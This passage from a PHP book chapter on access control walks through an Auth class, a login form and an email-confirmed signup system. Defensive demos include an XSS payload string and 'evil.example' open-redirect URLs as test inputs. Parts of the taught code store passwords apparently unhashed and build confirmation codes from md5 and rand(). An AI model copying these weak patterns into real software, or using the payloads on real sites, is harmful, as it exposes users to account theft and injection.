For security reasons, I choose to destroy the session here and start a completely new one. However, you may want to consider whether or not you wish to destroy the session. When the session is destroyed, not only are the Auth credentials removed, but all session data is as well, and a new session ID is created. If you have session data that you don’t want to lose upon logout, you may wish to remove or comment out the session->destroy method call.

The final piece of our Auth class is the redirect method:

Auth.class.php (excerpt)

        private function redirect($from = true)
        {
            if ($from) {
                // urlencode keeps any "?" and "&" in the original URL from
                // being read as part of the login page's own query string
                header('Location: ' . $this->redirect . '?from=' .
                    urlencode($_SERVER['REQUEST_URI']));
            } else {
                header('Location: ' . $this->redirect);
            }
            exit();
        }
    }

The redirect method is used to return the visitor to the login form (or whichever URL we specified upon instantiating the Auth class). By default, this method will send the URL of the originally requested page, in the from variable, in the query string to the URL to which the browser is redirected (most likely the login form). This allows the login form to read the query string and return the users to the location from which they came; it saves the users from having to navigate back to that point, a feature that might be useful if, for example, a session times out.

Note that I specified in the logout method that redirect should not provide the from variable. If it did, the script might return users to the URL they used to log out, trapping them in a loop from which they can’t log in.

One important point to note here is that the redirection URL argument passed to the constructor function should be absolute, not relative. The original HTTP/1.1 specification (RFC 2616) required an absolute URL in a Location header; the later RFC 7231 relaxed this to permit relative references. Later on, when we put this class into action, I’ll use a relative URL, because I can’t guess the script’s location on your server. This works because browsers resolve a relative location against the requested URL. On a live site, though, it’s still safest to provide a full, absolute URL.

Finally, and most importantly, we use the exit function to terminate all further processing. Calling the exit function prevents the calling script from sending the protected content that follows the authentication code. Although we’ve sent a header that should redirect the browser, we can’t rely on the browser to do what it’s told.
If the request were sent by, for instance, a Perl script pretending to be a web browser, whoever was using the script would, no doubt, have total control over
its behavior and could quite easily ignore the instruction to redirect elsewhere. Hence, the exit statement is crucial.

The Restricted Area

Now that you’ve seen the internals of the Auth class, let’s take a look at some code that makes use of it. Here’s an example of a page we want to protect. First, we list the files we require:

access.php (excerpt)

    <?php
    require_once 'strip_quotes.php';
    require_once 'Session.class.php';
    require_once 'Auth.class.php';
    require_once 'dbcred.php';

strip_quotes.php is a general-purpose script that checks for magic_quotes_gpc = On and strips the added slashes from incoming requests, if necessary. Session.class.php is the Session class required by our Auth class and Auth.class.php is the Auth class itself. dbcred.php contains our database login credentials for use with PDO. The file contains credentials relevant to our testing environment, so you’ll need to change them should you wish to try this on your own web server.

Next, we instantiate the PDO object and authenticate the user. This code needs to go at the top of any page we wish to protect from unauthorized access:

access.php (excerpt)

    try {
        $dbh = new PDO($dsn, $user, $password);
        $dbh->setAttribute(PDO::ATTR_ERRMODE,
            PDO::ERRMODE_EXCEPTION);
    }
    catch (PDOException $e) {
        error_log('Error in ' . $e->getFile() .
            ' Line: ' . $e->getLine() .
            ' Error: ' . $e->getMessage()
        );
        // Encode the values so spaces and "&" survive in the query string
        header('Location: error.php?err=' . urlencode('Database Error') .
            '&msg=' . urlencode($e->getMessage()));
        exit();
    }
    $auth = new Auth($dbh, 'login.php', 'secret');
    if (isset($_GET['action']) && $_GET['action'] == 'logout') {
        $auth->logout();
    }
    ?>

First, we attempt to create a PDO instance to connect to our database. If an exception is thrown and we can’t connect, we don’t want to reveal our protected content. Instead, we simply log the error, and redirect the user to an error page that displays some helpful information. Once we have a PDO instance, we can create a new Auth instance to check the current user’s login credentials. We pass our PDO instance, the URL of our login form (login.php), and the seed for the login details hashing functionality to the constructor function.

Following that, we use an if statement to check for a logout request. If a $_GET['action'] variable is present and it equals the value logout, we know the logout link has been clicked and we should log the user out by way of the Auth->logout method. All we have to do to make a logout link is append ?action=logout to any URL on our site.

Finally, here’s the HTML of our restricted page, complete with a logout link:

access.php (excerpt)

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
      ⋮ HTML head contents…
    </head>
    <body>
      ⋮ restricted content…
      <p><a href="<?php echo $_SERVER['PHP_SELF']; ?>?action=logout">Logout</a></p>
    </body>
    </html>
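One detail of the logout link deserves care: $_SERVER['PHP_SELF'] can include extra path text supplied in the request, so it is safer to escape it before echoing it into HTML. The sketch below shows one way to do that; logoutHref is a hypothetical helper name introduced only for this illustration.

```php
<?php
// Hypothetical helper: builds the logout URL and escapes it for use
// inside an HTML attribute.
function logoutHref($self)
{
    return htmlspecialchars($self . '?action=logout', ENT_QUOTES, 'UTF-8');
}

// An ordinary script path passes through unchanged
$normal = logoutHref('/access.php');

// A path carrying markup is neutralized: quotes and angle brackets
// become HTML entities instead of closing the attribute
$hostile = logoutHref('/access.php/"><script>alert(1)</script>');
```

In the page itself, this would mean echoing logoutHref($_SERVER['PHP_SELF']) inside the href attribute.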
The only way the user can view this page is to provide a correct username and password. The Auth class performs the security check as soon as it’s instantiated. If valid username and password values have been submitted via a form, they’re stored by the Auth class in a session variable, which allows the visitor to continue using the site’s various sections without having to log in again.

Creating the login form itself isn’t complex, but it’s made even easier with the PEAR::HTML_QuickForm package. HTML_QuickForm allows us to add fields to our form and define the validation requirements easily. I won’t launch into an explanation of how this works, but if you’d like to learn more about HTML_QuickForm, you can read the documentation online. [7]

PEAR PHP 5 E_STRICT Compliance

It should be noted that most PEAR packages are not PHP 5 E_STRICT compliant. You can expect errors to be generated, but don’t forget that you can turn them off with the error_reporting function. Submit a bug report to the PEAR bug system for any errors you do come across to help stomp them out in future versions. [8]

[7] http://pear.php.net/manual/en/package.html.html-quickform.php
[8] http://pear.php.net/bugs/

Let’s begin the login form: we’ll start by setting the error reporting level and requiring the PEAR::HTML_QuickForm package:

login.php (excerpt)

    <?php
    error_reporting(E_ALL);
    require_once 'HTML/QuickForm.php';

We set the error reporting level to E_ALL with the error_reporting function since we’re using PEAR packages, which will cause E_STRICT errors under PHP 5. (In PHP 5 releases before 5.4, E_ALL doesn’t include E_STRICT, so this setting keeps those messages out of the way.) Next we check for the presence of a $_GET['from'] variable:
login.php (excerpt)

    if (isset($_GET['from'])) {
        $target = $_GET['from'];
    } else {
        $target = 'access.php';
    }

The $_GET['from'] variable will have been set by our Auth class if it’s required. This variable will represent the page to which the user was trying to gain access, and from which they’ve been redirected to this login form. It’s used as the form’s action attribute to send the user back to that page once he or she is logged in. Otherwise, for the purposes of this demonstration, the form defaults to access.php, our demonstration restricted-content page.

The next step is to construct our form with the PEAR::HTML_QuickForm class:

login.php (excerpt)

    $form = new HTML_QuickForm('loginForm', 'POST', $target);

    // Add a header to the form
    $form->addElement('header', 'MyHeader', 'Please Login');

    // Add a field for the login name
    $form->addElement('text', 'login', 'Username');
    $form->addRule('login', 'Enter your login', 'required', false,
        'client');

    // Add a field for the password
    $form->addElement('password', 'password', 'Password');
    $form->addRule('password', 'Enter your password', 'required',
        false, 'client');

    // Add a submit button
    $form->addElement('submit', 'submit', ' Login ');
    ?>
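Since $_GET['from'] arrives from the browser, it falls under the golden rule about never trusting submitted content: used unchecked as the form’s action, it could point the login form at another site. A minimal sketch of one possible check follows, assuming that only same-site targets beginning with a single slash should be accepted; safeTarget is a hypothetical function name, not part of the book’s code.

```php
<?php
// Hypothetical helper: accept only same-site, path-only targets and
// fall back to a default page for anything else.
function safeTarget($from, $default = 'access.php')
{
    // Must be a non-empty string that starts with "/"
    if (!is_string($from) || $from === '' || $from[0] !== '/') {
        return $default;
    }
    // "//host" and "/\host" can be treated by browsers as another site
    if (strlen($from) > 1 && ($from[1] === '/' || $from[1] === '\\')) {
        return $default;
    }
    // Reject control characters such as CR and LF
    if (preg_match('/[\x00-\x1F\x7F]/', $from)) {
        return $default;
    }
    return $from;
}

$sameSite = safeTarget('/members/index.php?page=2');
$offSite  = safeTarget('http://evil.example/steal.php');
$schemeless = safeTarget('//evil.example/steal.php');
$missing  = safeTarget(null);
```

With a check like this in place, the first branch of the if statement would assign safeTarget($_GET['from']) to $target. The rule chosen here is deliberately strict; a site that needs other target forms would have to adapt it.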
Finally, we have the HTML for the login form page:

login.php (excerpt)

    <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
        "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
    <html xmlns="http://www.w3.org/1999/xhtml">
    <head>
      ⋮ HTML head contents…
    </head>
    <body>
      <h1>Please log in</h1>
      <?php echo $form->toHTML(); ?>
    </body>
    </html>

The finished login form can be seen in Figure 10.2.

Figure 10.2. The finished login form

Discussion

Access control consists of two main parts, or stages:

Authentication
Authentication is the process by which you determine that users are who they say they are. Our Auth class handles this determination for us in the login method, when we confirm the username and password against the database.
We make the assumption that only the correct user will have these two pieces of information.

Authorization
Authorization is the process by which you determine which permissions must be given to an authenticated user. The Auth class is very limited in this respect, as no levels of access are defined: there’s only global access or no access to the site. Of course, you may want to grant a level of access that lies somewhere between these extremes, in which case you should see “How do I build a permissions system?”

You may wonder why we handle the users in this class using a database, rather than something similar to the HTTP authentication explained earlier. There are a couple of reasons, actually. First, as a site grows from only a few members to hundreds, thousands, or millions (we hope) of members, HTTP authentication becomes harder to handle and slower. Yes, we can add the member details to the user file, but as this, in turn, grows larger, it takes longer for the server to read and find a given user. Second, what if we want to store more information about the user than just the username and password, as, of course, most of us do? Where would we keep that information? Well, we’d keep it in the database, of course. Doesn’t that mean we’re storing user information in two places? Yes, that’s right and, as you know, that’s something we’d want to avoid; it just makes the job harder for us if we ever have to go back and change things later.

Room for Improvement

The basic mechanics of the Auth class are solid, but it lacks the more sophisticated elements that will be necessary to halt the efforts of any serious intruders.

It’s a good idea to implement a mechanism that can keep an eye on the number of failed login attempts made from a single client.
If your application always responds immediately to any login attempt, it will be possible for a potential intruder to make large numbers of requests—with different username and password combinations—in a very short time, possibly using automated software to do so. The solution is to build a mechanism that counts the number of failed attempts using a session variable. Every time the number of failures is divisible by three (such as when three incorrect passwords are entered), use PHP’s sleep function to delay the next attempt by, for example, ten seconds. You may also decide that, after a certain threshold value (15 failed attempts, for example), you block all further access from that IP address for
a given period, such as one hour. Of course, changing an IP address is easy for a determined intruder, but you’ll stall would-be intruders, at least, and perhaps make their lives difficult enough to persuade them to pursue their nefarious activities elsewhere.

How do I build a registration system?

Having an authentication system is fine, but how will you fill it with users in the first place? If only you and a few friends will access your site, you can probably create accounts for all users through your database administration interface. However, for a site that’s intended to become a flourishing community to which anyone and everyone is free to sign up, you’ll likely need to automate this process. You’ll want to allow visitors to register themselves, but you’ll probably conduct some level of “screening” so that you have at least a little information about the people who have signed up, such as a way to confirm their identities. A common and effective screening approach is to have the registrants confirm their email address.

The purpose of the screening mechanism is to make it difficult for users who have “broken the rules” in some way and lost their account privileges to create new accounts. You have their email addresses, or at least one of their email addresses; if they try to register again with that address, you can deny them access. Be warned, though: a new type of Internet service is becoming popular. Pioneered by Mailinator, these services provide users with temporary email addresses that they can use for registrations. This, of course, means email is not a fool-proof screening mechanism, but it is still a worthwhile addition to a registration system.

Solution

Here, we’ll put together a registration system that validates new registrants using their email addresses, and in turn, sends them an email that asks them to confirm their registration via a URL.
A registration system is yet another great opportunity to build more classes! This time, though, it will be even more interesting, as we use the PEAR::HTML_QuickForm [9] package and PEAR::Mail_Mime [10] to do some of the work for the registration system.

[9] http://pear.php.net/package/HTML_QuickForm/
[10] http://pear.php.net/package/Mail_Mime/
The rest will be handled by classes we’ll build, but the end result will be easy for you to customize and reuse in your own applications.

First of all, we need to understand the process of signing up a new user:

■ The user fills in the registration form.
■ Upon the user’s completion of the form, the registration system inserts a record into the signup table and sends a confirmation email.
■ The visitor follows the link in the email and confirms the account.
■ We copy the details from the signup table to the user table. The account is now active.

We use two tables for handling signups: this way, we can separate the “dangerous” or unverified user data from the “safe” or confirmed user data. You’ll need a cron job or similar scheduled task to check the signup table on a regular basis and delete any entries that are older than, say, 24 hours. Our separation of the tables makes it easier to purge the contents of the signup table (and avoid unfortunate errors), and keep the user table trim so that there’s no unnecessary impact on performance during user authentication.

Our solution uses a specific database structure. Here’s the SQL for the signup table:

access_control.sql (excerpt)

    CREATE TABLE signup (
      signup_id INT(11) NOT NULL AUTO_INCREMENT,
      login VARCHAR(50) NOT NULL DEFAULT '',
      password VARCHAR(50) NOT NULL DEFAULT '',
      email VARCHAR(50) DEFAULT NULL,
      firstName VARCHAR(50) DEFAULT NULL,
      lastName VARCHAR(50) DEFAULT NULL,
      signature TEXT NOT NULL,
      confirm_code VARCHAR(40) NOT NULL DEFAULT '',
      created INT(11) NOT NULL DEFAULT '0',
      PRIMARY KEY (signup_id),
      UNIQUE KEY confirm_code (confirm_code),
      UNIQUE KEY user_login (login),
      UNIQUE KEY email (email)
    );
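The scheduled clean-up of unconfirmed signups mentioned above could be sketched roughly as follows. This is an illustration under stated assumptions, not part of the book’s code: purgeStaleSignups is a hypothetical function, the demo runs against an in-memory SQLite table (which needs the pdo_sqlite extension) holding only the columns the purge touches, and the created column is taken to hold a Unix timestamp, as in the table definition above.

```php
<?php
// Hypothetical helper: delete signups older than $maxAge seconds and
// return how many rows were removed. $now can be injected for testing.
function purgeStaleSignups(PDO $db, $maxAge = 86400, $now = null)
{
    $cutoff = ($now === null ? time() : $now) - $maxAge;
    $stmt = $db->prepare('DELETE FROM signup WHERE created < :cutoff');
    $stmt->bindValue(':cutoff', $cutoff, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}

// Demo data: one signup from 25 hours ago, one from a minute ago
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE signup (login TEXT, created INTEGER)');
$now = 1000000; // fixed "current time" so the demo is repeatable
$db->exec("INSERT INTO signup VALUES ('old', " . ($now - 90000) . ")");
$db->exec("INSERT INTO signup VALUES ('new', " . ($now - 60) . ")");

$deleted = purgeStaleSignups($db, 86400, $now);
$remaining = $db->query('SELECT login FROM signup')
                ->fetchAll(PDO::FETCH_COLUMN);
```

A cron job would call a function like this with the real database connection and the default arguments, for example once an hour.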
Here’s the SQL for the user table:

access_control.sql (excerpt)

    CREATE TABLE user (
      user_id INT(11) NOT NULL AUTO_INCREMENT,
      login VARCHAR(50) NOT NULL DEFAULT '',
      password VARCHAR(50) NOT NULL DEFAULT '',
      email VARCHAR(50) DEFAULT NULL,
      firstName VARCHAR(50) DEFAULT NULL,
      lastName VARCHAR(50) DEFAULT NULL,
      signature TEXT NOT NULL,
      PRIMARY KEY (user_id),
      UNIQUE KEY user_login (login)
    );

The SignUp Class

The first part of our solution is the SignUp class, which provides all the functionality for signing up new users, and uses the following configuration settings:

access_control.ini (excerpt)

    ; Access Control Settings

    ;user login table details
    [users_table]
    table=user
    col_id=user_id
    col_login=login
    col_password=password
    col_email=email
    col_name_first=firstName
    col_name_last=lastName
    col_signature=signature

    ;signup login table details
    [signup_table]
    table=signup
    col_id=signup_id
    col_login=login
    col_password=password
    col_email=email
    col_name_first=firstName
    col_name_last=lastName
    col_signature=signature
    col_code=confirm_code
    col_created=created

The first group of settings represents the details of the user table in our database: the name of the table and its columns. The second group represents the table and column names of the signup table.

Let’s define some custom exception classes so that we can provide a consistent level of error handling:

Signup.class.php (excerpt)

    class SignUpException extends Exception
    {
        public function __construct($message = null, $code = 0)
        {
            parent::__construct($message, $code);
            error_log('Error in ' . $this->getFile() .
                ' Line: ' . $this->getLine() .
                ' Error: ' . $this->getMessage()
            );
        }
    }
    class SignUpDatabaseException extends SignUpException {}
    class SignUpNotUniqueException extends SignUpException {}
    class SignUpEmailException extends SignUpException {}
    class SignUpConfirmationException extends SignUpException {}

Our base class, SignUpException, is a custom exception that ensures the exception details are logged using the error_log function. The subclasses represent different exception situations that might arise during the signup process. This method of error handling ensures that all exceptions are logged consistently, and allows any script that uses our SignUp class to implement custom logic to handle the various types of exceptions. We’ll see how such logic can be implemented in our script very soon.

We begin our SignUp class definition with the class properties:
Signup.class.php (excerpt)

    class SignUp
    {
        protected $db;
        protected $cfg;
        protected $from;
        protected $to;
        protected $subject;
        protected $message;
        protected $html;
        protected $listener;
        protected $confirmCode;

$db will contain a PDO instance for our database connection, $cfg will store our configuration details, $from will contain the name and address used in the confirmation email’s From field, $to will contain the name and address the email is sent to, $subject will contain the subject of the email, $message will represent the body of the email, and $html will contain a true or false value to indicate whether or not the email is an HTML email. The $listener property will contain the URL listed as the email confirmation link and $confirmCode will contain the unique code needed to confirm this particular user’s registration.

The $to and $confirmCode properties are set and used internally by the class, while the rest of the properties are initialized by the class constructor:

Signup.class.php (excerpt)

        public function __construct(PDO $db, $listener, $frmName,
            $frmAddress, $subj, $msg, $html)
        {
            $this->db = $db;
            $this->cfg = parse_ini_file('access_control.ini', TRUE);
            $this->listener = $listener;
            $this->from[$frmName] = $frmAddress;
            $this->subject = $subj;
            $this->message = $msg;
            $this->html = $html;
        }
When we instantiate the object in the constructor above, we need to pass it a PDO object instance containing the connection to the database, the URL to which registrants should be directed when they confirm their signups, a Sender name and From address for use in the signup email (for example Your Name <you@yoursite.com>), and the subject and message for the email itself. Finally, we need to identify whether or not this is an HTML email, so that PEAR::Mail_Mime can format the message correctly.

Whether it contains HTML or not, the message should contain at least one special tag: <confirm_url/>. This acts as a placeholder in the message, identifying the location in the email body at which the confirmation URL, built by the SignUp class, should be inserted.

The createCode method is called internally within the class, and is used to generate the confirmation code that will be sent via email:

Signup.class.php (excerpt)

        private function createCode($login)
        {
            srand((double)microtime() * 1000000);
            $this->confirmCode = md5($login . time() . rand(1, 1000000));
        }

When the registration form is submitted, the createSignup method creates a record of the registration request. The createSignup method takes the information the user submits via the registration form, checks the database to ensure that the username and email address do not already exist in the user table, and inserts a new record into the signup table. Let’s take a look at how this method works:

Signup.class.php (excerpt)

        public function createSignup($userDetails)
        {
            $user_table = $this->cfg['users_table']['table'];
            $user_login = $this->cfg['users_table']['col_login'];
            $user_pass = $this->cfg['users_table']['col_password'];
            $user_email = $this->cfg['users_table']['col_email'];
            $user_first = $this->cfg['users_table']['col_name_first'];
            $user_last = $this->cfg['users_table']['col_name_last'];
            $user_sig = $this->cfg['users_table']['col_signature'];
            $sign_table = $this->cfg['signup_table']['table'];
            $sign_login = $this->cfg['signup_table']['col_login'];
            $sign_pass = $this->cfg['signup_table']['col_password'];
            $sign_email = $this->cfg['signup_table']['col_email'];
            $sign_first = $this->cfg['signup_table']['col_name_first'];
            $sign_last = $this->cfg['signup_table']['col_name_last'];
            $sign_sig = $this->cfg['signup_table']['col_signature'];
            $sign_code = $this->cfg['signup_table']['col_code'];
            $sign_created = $this->cfg['signup_table']['col_created'];
            try {
                $sql = "SELECT COUNT(*) AS num_row FROM " .
                       $user_table . " WHERE " .
                       $user_login . "=:login OR " .
                       $user_email . "=:email";
                $stmt = $this->db->prepare($sql);
                $stmt->bindParam(':login', $userDetails[$user_login]);
                $stmt->bindParam(':email', $userDetails[$user_email]);
                $stmt->execute();
                $result = $stmt->fetch(PDO::FETCH_ASSOC);
            }
            catch (PDOException $e) {
                throw new SignUpDatabaseException('Database error when' .
                    ' checking user is unique: ' . $e->getMessage());
            }

First, we assign all the needed configuration settings to local variables to improve the readability of our script.

The first action the method performs is to complete a database query: it counts the number of rows in the user table where the submitted username matches the value in the login column in the database, or where the submitted email address is a match to the value in the email column. We wrap this action within a try {…} catch (PDOException $e) {…} block in case a PDOException is thrown. When we catch the PDOException, we throw one of the custom exceptions we wrote for this class: a SignUpDatabaseException.

The next step for the createSignup method is to check the results of the query and, if it’s okay to proceed, to prepare the data for insertion into the signup table:
  • 328.
Signup.class.php (excerpt)

    if ($result['num_row'] > 0) {
      throw new SignUpNotUniqueException(
          'username and email address not unique');
    }
    $this->createCode($userDetails[$user_login]);
    $toName = $userDetails[$user_first] . ' ' .
        $userDetails[$user_last];
    $this->to[$toName] = $userDetails[$user_email];

If the count is greater than 0, we already have a user with that username or email address, and it’s not okay to proceed with the signup. Our reaction is to throw another one of our custom exceptions, this time a SignUpNotUniqueException, to indicate that the signup details are not unique. Otherwise, we generate the confirmation code and record the recipient’s name and email address for the confirmation email.

The final step in the createSignup method is to insert the new registration into the signup table:

Signup.class.php (excerpt)

    try {
      $sql = "INSERT INTO " . $sign_table . "(".
          $sign_login . ", " . $sign_pass . ", " .
          $sign_email . ", " . $sign_first . ", " .
          $sign_last . ", " . $sign_sig . ", " .
          $sign_code . ", " . $sign_created . ") ".
          "VALUES (:login, :password, :email, :firstname,
          :lastname, :signature, :confirm, :time)";
      $stmt = $this->db->prepare($sql);
      $stmt->bindParam(':login', $userDetails[$user_login]);
      $stmt->bindParam(':password', $userDetails[$user_pass]);
      $stmt->bindParam(':email', $userDetails[$user_email]);
      $stmt->bindParam(':firstname', $userDetails[$user_first]);
      $stmt->bindParam(':lastname', $userDetails[$user_last]);
      $stmt->bindParam(':signature', $userDetails[$user_sig]);
      $stmt->bindParam(':confirm', $this->confirmCode);
      // bindValue, because time() returns a value, not a variable
      // that bindParam could bind by reference
      $stmt->bindValue(':time', time());
      $stmt->execute();
  • 329.
    } catch (PDOException $e) {
      throw new SignUpDatabaseException('Database error when' .
          ' inserting into signup: '.$e->getMessage());
    }
  }

All the data in the $userDetails variable (the details submitted via the registration form) is inserted into the signup table. If a PDOException is thrown, we throw a new instance of our SignUpDatabaseException class.

The sendConfirmation method is used to send a confirmation email to the person who’s just signed up:

Signup.class.php (excerpt)

  public function sendConfirmation()
  {
    // Pear Mail_Mime included in the calling script
    $fromName = key($this->from);
    $hdrs = array(
      'From' => $this->from[$fromName],
      'Subject' => $this->subject
    );
    $crlf = "\n";
    if ($this->html) {
      $replace = '<a href="' . $this->listener . '?code=' .
          $this->confirmCode . '">' . $this->listener .
          '?code=' . $this->confirmCode . '</a>';
    } else {
      $replace = $this->listener . '?code=' . $this->confirmCode;
    }
    $this->message = str_replace('<confirm_url/>',
        $replace,
        $this->message
    );
    $mime = new Mail_mime($crlf);
  • 330.
    $mime->setHTMLBody($this->message);
    $mime->setTXTBody(strip_tags($this->message));
    $body = $mime->get();
    $hdrs = $mime->headers($hdrs);
    $mail = Mail::factory('mail');
    $succ = $mail->send($this->to, $hdrs, $body);
    if (PEAR::isError($succ)) {
      throw new SignUpEmailException('Error sending confirmation' .
          ' email: ' .$succ->getDebugInfo());
    }
  }

The sendConfirmation method will generate the content of the confirmation email, in HTML or text, by replacing the special text <confirm_url/> with the confirmation URL the user will need to click on to confirm the registration. The confirmation URL is built from the $listener property, set by the class constructor, and the unique code that the createCode method stored in the $confirmCode property. sendConfirmation then uses an instance of the PEAR::Mail_mime class to create the email, and PEAR::Mail to send it. If an error occurs while sending the email, another one of our custom exceptions, SignUpEmailException, will be thrown. We’ll also use the getDebugInfo method of the PEAR_Error object to obtain some information about the error.

Finally, the confirm method is used to examine confirmations via the URL sent in the email:

Signup.class.php (excerpt)

  public function confirm($confirmCode)
  {
    $user_table = $this->cfg['users_table']['table'];
    $user_login = $this->cfg['users_table']['col_login'];
    $user_pass = $this->cfg['users_table']['col_password'];
    $user_email = $this->cfg['users_table']['col_email'];
    $user_first = $this->cfg['users_table']['col_name_first'];
    $user_last = $this->cfg['users_table']['col_name_last'];
    $user_sig = $this->cfg['users_table']['col_signature'];
    $sign_table = $this->cfg['signup_table']['table'];
    $sign_id = $this->cfg['signup_table']['col_id'];
    $sign_login = $this->cfg['signup_table']['col_login'];
  • 331. Access Control 307 $sign_pass = $this->cfg['signup_table']['col_password']; $sign_email = $this->cfg['signup_table']['col_email']; $sign_first = $this->cfg['signup_table']['col_name_first']; $sign_last = $this->cfg['signup_table']['col_name_last']; $sign_sig = $this->cfg['signup_table']['col_signature']; $sign_code = $this->cfg['signup_table']['col_code']; try { $sql = "SELECT * FROM " . $sign_table . " WHERE " . $sign_code . "=:confirmCode"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':confirmCode', $confirmCode); $stmt->execute(); $row = $stmt->fetchAll(); } catch (PDOException $e) { throw new SignUpDatabaseException('Database error when' . ' inserting user info: '.$e->getMessage()); } Again, we assign configuration settings to local variables to improve the script’s readability. First, the confirm method selects from the signup table all records that have a value in the confirm_code column that matches the $confirmCode value. If the number of records returned is anything other than 1, a problem has occurred and a SignUpConfirmationException exception is thrown: Signup.class.php (excerpt) if (count($row) != 1) { throw new SignUpConfirmationException(count($row) . ' records found for confirmation code: ' . $confirmCode ); } If only one matching record is found, the method can continue to process the con­ firmation:
  • 332. 308 The PHP Anthology Signup.class.php (excerpt) try { // Copy the data from Signup to User table $sql = "INSERT INTO " . $user_table . " ( " . $user_login . ", " . $user_pass . ", " . $user_email . ", " . $user_first . ", " . $user_last . ", " . $user_sig . ") VALUES ( :login, :pass, :email, :firstname, :lastname, :sign )"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':login',$row[0][$sign_login]); $stmt->bindParam(':pass',$row[0][$sign_pass]); $stmt->bindParam(':email',$row[0][$sign_email]); $stmt->bindParam(':firstname',$row[0][$sign_first]); $stmt->bindParam(':lastname',$row[0][$sign_last]); $stmt->bindParam(':sign',$row[0][$sign_sig]); $stmt->execute(); $result = $stmt->fetch(); // Delete row from signup table $sql = "DELETE FROM " . $sign_table . " WHERE " . $sign_id . "= :id"; $stmt = $this->db->prepare($sql); $stmt->bindParam(':id', $row[0][$sign_id]); $stmt->execute(); } catch (PDOException $e) { throw new SignUpDatabaseException('Database error when' . ' inserting user info: '.$e->getMessage()); } } } If an account is successfully confirmed, the record is copied to the user table, and the old record is deleted from the signup table. Thus the confirmation process, the user’s registration, and our SignUp class, is complete! The Signup Page Now that our SignUp class is done, we need a web page from which to display the registration form and run the process.
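Before moving on to the page itself, one aspect of the confirm method may be worth a closer look: it runs an INSERT followed by a DELETE, and if the second statement fails, the registration is left in both tables. The following is a minimal sketch of wrapping both statements in a PDO transaction. It is not the book's code: it assumes the pdo_sqlite driver is available, uses simplified, hypothetical table layouts in an in-memory database, and the function name confirmInTransaction is made up for illustration. With MySQL, the tables would also need a transactional storage engine such as InnoDB.

```php
<?php
// Hypothetical, simplified tables in an in-memory SQLite database
$db = new PDO('sqlite::memory:');
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec('CREATE TABLE signup (signup_id INTEGER PRIMARY KEY,
    login TEXT, confirm_code TEXT)');
$db->exec('CREATE TABLE user (user_id INTEGER PRIMARY KEY,
    login TEXT UNIQUE)');
$db->exec("INSERT INTO signup (login, confirm_code)
    VALUES ('alice', 'abc123')");

// Hypothetical helper: copy the signup row to user and delete it,
// so that either both statements take effect or neither does
function confirmInTransaction(PDO $db, $code)
{
  $stmt = $db->prepare('SELECT signup_id, login FROM signup
      WHERE confirm_code = :code');
  $stmt->execute(array(':code' => $code));
  $rows = $stmt->fetchAll(PDO::FETCH_ASSOC);
  if (count($rows) != 1) {
    return false; // unknown or ambiguous confirmation code
  }

  $db->beginTransaction();
  try {
    $insert = $db->prepare('INSERT INTO user (login) VALUES (:login)');
    $insert->execute(array(':login' => $rows[0]['login']));
    $delete = $db->prepare('DELETE FROM signup WHERE signup_id = :id');
    $delete->execute(array(':id' => $rows[0]['signup_id']));
    $db->commit();
    return true;
  } catch (PDOException $e) {
    $db->rollBack(); // undo the INSERT if the DELETE failed
    throw $e;
  }
}

var_dump(confirmInTransaction($db, 'abc123')); // bool(true)
```

A second call with the same code returns false in this sketch, because the signup row has already been removed.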
  • 333. Access Control 309 The first step is to include the classes we’ll use: signup.php (excerpt) <?php error_reporting(E_ALL); require_once 'SignUp.class.php'; require_once 'HTML/QuickForm.php'; require_once 'Mail.php'; require_once 'Mail/mime.php'; require 'dbcred.php'; First, because we’re using PEAR packages, which will cause E_Strict errors under PHP 5, we set the error reporting level to E_ALL with the error_reporting function. Of course, we need to include our SignUp class file. We’ll also be using the PEAR HTML_Quickform and Mail_mime packages. The dbcred.php file contains the database credentials we’ll need to connect to our database. Next, we create the variables we need: signup.php (excerpt) $reg_messages = array( 'success' => array( 'title' => 'Confirmation Successful', 'content' => '<p>Thank you. Your account has now been' . ' confirmed.<br />You can now <a href="access.php">login' . '</a></p>' ), 'confirm_error' => array( 'title' => 'Confirmation Problem', 'content' => '<p>There was a problem confirming your' . ' account.<br />Please try again or contact the site ' . 'administrators</p>' ), 'email_sent' => array( 'title' => 'Check your email', 'content' => '<p>Thank you. Please check your email to ' . 'confirm your account</p>' ), 'email_error' => array( 'title' => 'Email Problem',
  • 334. 310 The PHP Anthology 'content' => '<p>Unable to send confirmation email.<br />' . 'Please contact the site administrators.</p>' ), 'signup_not_unique' => array( 'title' => 'Registration Problem', 'content' => '<p>There was an error creating your' . ' account.<br />The desired username or email address has' . ' already been taken.</p>' ), 'signup_error' => array( 'title' => 'Registration Problem', 'content' => '<p>There was an error creating your' . ' account.<br />Please contact the site administrators.' . '</p>' ) ); $listener = 'http://localhost/phpant2/chapter_10/examples/' . 'signup.php'; $frmName = 'Your Name'; $frmAddress = 'noreply@yoursite.com'; $subj = 'Account Confirmation'; $msg = <<<EOD <html> <body> <h2>Thank you for registering!</h2> <div>The final step is to confirm your account by clicking on:</div> <div><confirm_url/></div> <div> <b>Your Site Team</b> </div> </body> </html> EOD; The $reg_messages variable contains an array of page titles and messages that will be used in the web page, depending on the stage and status of the registration process. $listener, $frmName, $frmAddress, $subj, and $msg are required by our Signup class. If you have a look at the $msg variable, the body of our confirmation email, you’ll see the special <confirm_url/> code which will be replaced by the confirm­ ation URL later in the process.
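The placeholder substitution described above can be sketched as a standalone function. This is only an illustration of the idea, not the SignUp class itself: the function name fillConfirmUrl and the sample URL are hypothetical, and the urlencode and htmlspecialchars calls are extra precautions that the class excerpt does not include.

```php
<?php
// Hypothetical helper mirroring the substitution in sendConfirmation
function fillConfirmUrl($message, $listener, $code, $html)
{
  // urlencode is an added precaution, not part of the book's class
  $url = $listener . '?code=' . urlencode($code);
  if ($html) {
    // Escape the URL before placing it inside HTML markup
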